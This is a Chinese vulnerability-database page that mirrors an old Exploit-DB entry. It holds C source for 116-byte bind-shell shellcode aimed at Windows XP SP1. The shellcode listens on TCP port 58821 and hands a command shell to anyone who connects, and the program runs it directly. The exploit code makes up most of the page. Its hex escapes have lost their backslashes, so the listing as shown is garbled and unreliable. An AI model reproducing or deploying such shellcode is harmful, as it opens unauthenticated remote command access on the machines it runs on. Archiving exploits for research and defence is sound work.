Windows (XP SP1) – Bind (58821/TCP) Shell Shellcode (116 bytes)-安全小百科

Windows (XP SP1) – Bind (58821/TCP) Shell Shellcode (116 bytes)

漏洞ID	1054633	漏洞类型
发布时间	2004-09-26	更新时间	2004-09-26
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	Windows_x86	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/13531

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

/* 116 bytes bindcode hardcoded for Windows XP SP1 */
/* but you can change the address if you want */
/* i made it pretty clear where they are  */
/* the bindcode will bind to port 58821 */
/* by silicon / [email protected] */
/* greetz to dtors.net :)

#include <stdio.h>
#include <winsock2.h>

unsigned char bindcode[] = // 116 bytes bindcode for windows, port=58821, by silicon :)
"x83xC4xECx33xC0x50x50x50x6Ax06"
"x6Ax01x6Ax02xB8"
"x01x5AxABx71" // address of WSASocketA()
"xFFxD0x8BxD8x33xC0x89x45xF4xB0"
"x02x66x89x45xF0x66xC7x45xF2xE5"
"xC5x6Ax10x8Dx55xF0x52x53xB8"
"xCEx3ExABx71" // address of bind()
"xFFxD0x6Ax01x53xB8"
"xE2x5DxABx71" // address of listen()
"xFFxD0x33xC0x50x50x53xB8"
"x8Dx86xABx71" // address of accept()
"xFFxD0x8BxD8xBA"
"x1Dx20xE8x77" // address of SetStdHandle()
"x53x6AxF6xFFxD2x53x6AxF5xFFxD2"
"x53x6AxF4xFFxD2xC7x45xFBx41x63"
"x6Dx64x8Dx45xFCx50xB8"
"x44x80xC2x77" // address of system()
"xFFxD0";

int main(){
 WSADATA wsadata;
 WSAStartup(WINSOCK_VERSION,&wsadata);
 ((void (*)(void)) &bindcode)(); 
}

// milw0rm.com [2004-09-26]

相关推荐: PHPNuke Search Form Cross-Site Scripting Vulnerability

PHPNuke Search Form Cross-Site Scripting Vulnerability 漏洞ID 1101506 漏洞类型 Input Validation Error 发布时间 2002-09-24 更新时间 2002-09-24 CV…

文章版权归作者所有，未经允许请勿转载。

THE END